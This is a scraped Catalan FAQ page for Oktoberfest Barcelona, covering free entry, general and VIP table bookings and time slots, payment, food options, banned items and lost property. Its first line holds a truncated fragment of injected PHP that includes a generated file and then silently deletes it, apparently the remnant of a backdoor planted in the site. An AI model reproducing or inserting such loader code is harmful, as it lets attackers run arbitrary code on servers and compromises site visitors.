");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Oktoberfest Barcelona | FAQs | Festa de la Cervesa

Faqs

Faqs

Sí.

L'accés a aquesta festa popular és gratuït, únicament cal pagar les consumicions realitzades a la carpa.

Sí.

Es pot entrar a la festa sense disposar de reserva de taula, però hem habilitat un gestor de reserves de taula anticipada (general o VIP) per garantir-vos l'accés al recinte, doncs hi ha aforament limitat i a certes hores és possible que no es pugui accedir fins que alliberin espai els assistents.

La gestió de reserva de taula general és GRATUÏTA i es realitza des de la web oficial de l'Oktoberfest Barcelona.

Únicament haureu d'abonar les consumicions realitzades a la carpa.

Recorda imprimir la vostra reserva i presentar-la al control d'accés de la carpa de l'Oktoberfest Barcelona "Acreditaciones / Reserves Mesa", on sense fer la cua general i amb accés prioritari, us garantirà l'entrada a la carpa segons l'horari pel dia seleccionat.

Tots els assistents d'una mateixa reserva de taula hauran d'accedir junts a la carpa. Un cop validada la reserva de taula, aquesta deixarà de ser vàlida.

La reserva de taula VIP té associat un Menú VIP que inclou una graellada de salsitxes amb xucrut i kartoffelsalat, més un bretzel i un litre de Paulaner OktoberfestBier. Aquesta reserva de taula VIP té un cost de 24 € per persona que s'ha de pagar des del gestor de reserva de taula VIP de forma anticipada.

Amb la reserva de taula VIP impresa, us haureu d'adreçar a l'Accés Preferent de la festa identificat amb el cartell de "Acreditacions / VIPs / Reserva Taula", sense haver de fer la cua amb la resta d'assistents.

Se us canviarà la reserva de taula pels tiquets de consumicions i us donaran una polsera VIP identificativa d'accés exclusiu a la zona VIP.

Se us indicarà la ubicació on es troba la vostra taula VIP dins d'un espai restringit i exclusiu als assistents amb aquest tipus de taula, i per mitjà d'un segon control d'accés es validarà la vostra polsera identificativa VIP.

En aquest espai VIP, hi ha servei a taula tant de l'oferta gastronòmica com de cervesa. A la zona de taula general no hi ha servei de taula d'oferta gastronòmica, només de cervesa.

Tots els assistents d'una mateixa reserva de taula VIP hauran d'accedir junts a la carpa. Un cop validada la reserva de taula VIP, aquesta deixarà de ser vàlida.

Les reserves de taula general són per a unes franges horàries determinades segons el dia de la festa.

** 12:00 h - 16:00 h (Dissabtes, Diumenges i Festius)

** 17:00 h - 19:00 h (Dilluns, Dimarts, Dimecres, Dijous, Divendres, Dissabtes i Diumenges)

No es reserven taules a partir de les 19:00 h.

No obstant això, les taules estaran disponibles fins a cobrir l'aforament de la festa.

Tots els assistents d'una mateixa reserva de taula hauran d'accedir junts a la carpa. Un cop validada la reserva de taula, aquesta deixarà de ser vàlida.

Les reserves de taula VIP són per a unes franges horàries determinades segons el dia de la festa.

** 12:00 h - 17:00 h (Dissabtes, Diumenges i Festius)

** 17:00 h al tancament (Dilluns, Dimarts, Dimecres, Dijous, Divendres, Dissabtes i Diumenges)

Tots els assistents d'una mateixa reserva de taula hauran d'accedir junts a la carpa. Un cop validada la reserva de taula, aquesta deixarà de ser vàlida.

Les reserves de taula general són per a unes franges horàries determinades segons el dia seleccionat.

És "convenient" arribar a l'inici de la franja horària de la reserva i ocupar la vostra taula. Si no és així, podrien ser ocupades per altres grups.

No obstant això, si disposeu de reserva, i arribeu dins de la franja horària seleccionada, tindreu prioritat d'accés a la festa i, en la mesura del possible, se us intentarà subicar en alguna taula del recinte segons la característiques seleccionades en la vostra reserva d' taula.

Tots els assistents d'una mateixa reserva de taula hauran d'accedir junts a la carpa. Un cop validada la reserva de taula, aquesta deixarà de ser vàlida.

Amb la teva reserva de taula VIP podràs accedir tant a la carpa com a la Zona VIP, sempre dins de la franja horària pel dia seleccionat.

Tots els assistents d'una mateixa reserva de taula hauran d'accedir junts a la carpa. Un cop validada la reserva de taula, aquesta deixarà de ser vàlida.

Amb la vostra reserva de taula general realitzada per al primer torn (12.00 h - 16:00 h), acabat el temps, podreu romandre a la festa fins al tancament, però haureu d'alliberar la taula per al següent torn.

Amb la vostra reserva de taula general realitzada pel segon torn (17.00 h - 19:00 h), acabat el temps, podreu continuar guadint de la taula fins que finalitzi la festa aquest dia.

Amb la vostra reserva de taula VIP realitzada per al primer torn (12.00 h - 17:00 h ), acabat el temps, podreu romandre a la carpa principal de la festa fins al tancament, però haureu alliberar la taula per al següent torn.

Amb la vostra reserva de taula VIP realitzada pel segon torn (17:00 h al tancament ), podreu disposar de la taula fins que finalitzi la festa aquest dia.

La capacitat màxima per taula és de 8 persones.

És possible que quan et va arribar la confirmació de reserva de taula se situés en la carpeta de SPAM / no desitjats del teu correu, o que l'adreça de correu que vas indicar no fos correcta.

No obstant això, pots posar-te en contacte amb l'organització indicant la teva incidència a través d'aquest correu: info@oktoberfest-barcelona.es

Tornarem a enviar-te la teva confirmació de reserva de taula online.

Et recordem que la capacitat màxima de cada reserva de taula és de 8 persones.

Per realitzar una modificació a una reserva de taula, disposes d'una opció a la web on pots gestionar les teves dades i les teves reserves de taula realitzades.

Això pots fer-ho, accedint a la web, i en la part superior dreta veuràs una icona d'un usuari. Si prems sobre ell, introduint el mail indicat a la reserva, i la contrasenya que apareix al costat del mail a la reserva, podràs accedir al teu panell de control de reserves de taula en línia perquè les puguis gestionar (modificar o cancel·lar).

Amb la reserva de taula realitzada ( general o VIP ), i impresa la còpia de confirmació rebuda des de la web oficial, dirigir-vos al Punt d'Informació que es troba en la porta principal de la carpa i mostrar la vostra còpia perquè us ajudin a acomodar-vos en la vostra taula.

Sí.

Hi haurà possibilitat de pagar les consumicions tant en efectiu com amb targeta.

L'Oktoberfest Barcelona és una festa popular on tots estan convidats.

En tot moment, els menors hauran d'estar acompanyats pels seus pares o tutors, sent aquests últims els responsables de les accions que els menors realitzin a la festa.

L'Organització informa que la legislació vigent prohibeix expressament la venda d'alcohol als menors de 18 anys.

Aquest any disposarem de cervesa sense gluten en format d'ampolla en l'Oktoberfest Barcelona. Podeu veure les cerveses disponibles a l'apartat de [Cerveses Presencials] (http://www.oktoberfest-barcelona.es/cervezas-presenciales.html)

També disposarem de refrescs i aigües.

Dins la nostra oferta gastronòmica hi haurà possibilitat de gaudir-ne amb menús especialment preparats per a celíacs.

També disposarem d'Hamburguesa per vegans (feta al forn per evitar contacte amb olis i greixos vegetals o animals), així com amanida verda per als vegetarians, a més comptem amb una llista d'al·lèrgens i fitxes tècniques de tots els nostres productes.

Preguntar directament a les barres de dispensació de menjar per ells, entrant a la carpa principal zona esquerra, i us explicaran l'oferta disponible.

No.

No es pot entrar menjar ni beguda dins de la carpa.

No.

Dins de les carpes no hi haurà servei de distribució i/o venda de tabac.

Per motius de seguretat, no està permès l'accés a la festa ni amb cascs de moto, ni amb patinets, ni amb qualsevol altre material que l'equip de seguretat en el control d'accés consideri oportú per garantir la seguretat dels assistents i de l'staffPer motius de seguretat, no està permès l'accés a la festa ni amb cascs de moto, ni amb patinets, ni amb qualsevol altre material que l'equip de seguretat en el control d'accés consideri oportú per garantir la seguretat dels assistents i de l'staff

No.

Lamentem comunicar-vos que no està permès l'accés a la festa amb animals, excepte gossos guia per a persones cegues.

Sí.

Està permès l'accés i ús de càmeres fotogràfiques o de vídeo.

Si vens de fora no et preocupis perquè hi ha una gran oferta d'allotjament a prop del festival. Consulta diverses opcions aquí.

Podeu sol·licitar informació per a la reserva de stands enviant un correu a info@oktoberfest-barcelona.es

Si escau, des de l'organització de l'Oktoberfest Barcelona ens posarem en contacte.

No.

Dins de les carpes no s'ha habilitat cap espai per a consigna.

Sí.

El Punt d'Informació de la festa es farà servir també com a punt d'objectes perduts. Un cop s'acaba la jornada, tots els objectes dipositats es porten a les nostres oficines de producció i al dia següent es tornen a dipositar en el punt d'informació perquè puguin ser reclamats.

Un cop finalitzada l'Oktoberfest Barcelona, ​​tots els objectes que no han estat recollits / reclamats es lliuraran al departament d'Atenció al client de ServiFira ​​de Fira Barcelona:

Fira Barcelona Avinguda Reina M. Cristina s / n 08004 Barcelona

Tel: +34 93 233 22 93

Horari: De dilluns a divendres, de 09: 00h a 13:30 i de 15: 30h a 18: 00h

Sí.

Està situat al costat del Punt d'Informació, en l'entrada a la festa.

Si sorgeix algun problema, pots contactar amb qualsevol persona de l'organització, ells t'ajudaran en tot el que estigui a la seva mà.

També podràs trovar un ampli dispositiu de personal de seguretat repartit per tot el recinte.

Sí.

En la carpa principal es disposarà d'un equip sanitari on us atendran de qualsevol contratemps que hàgiu pogut sofrir durant la festa.

També podeu contactar amb algun membre de l'equip de cambrers, seguretat, o de l'organització, que us indicaran la seva ubicació, i/o acompanyaran si escau, per ser atensos.

Algun dubte o consulta més ?

Si té algun altre dubte o consulta, pot fer-nos-la arribar a través del nostre formulari.

Contacte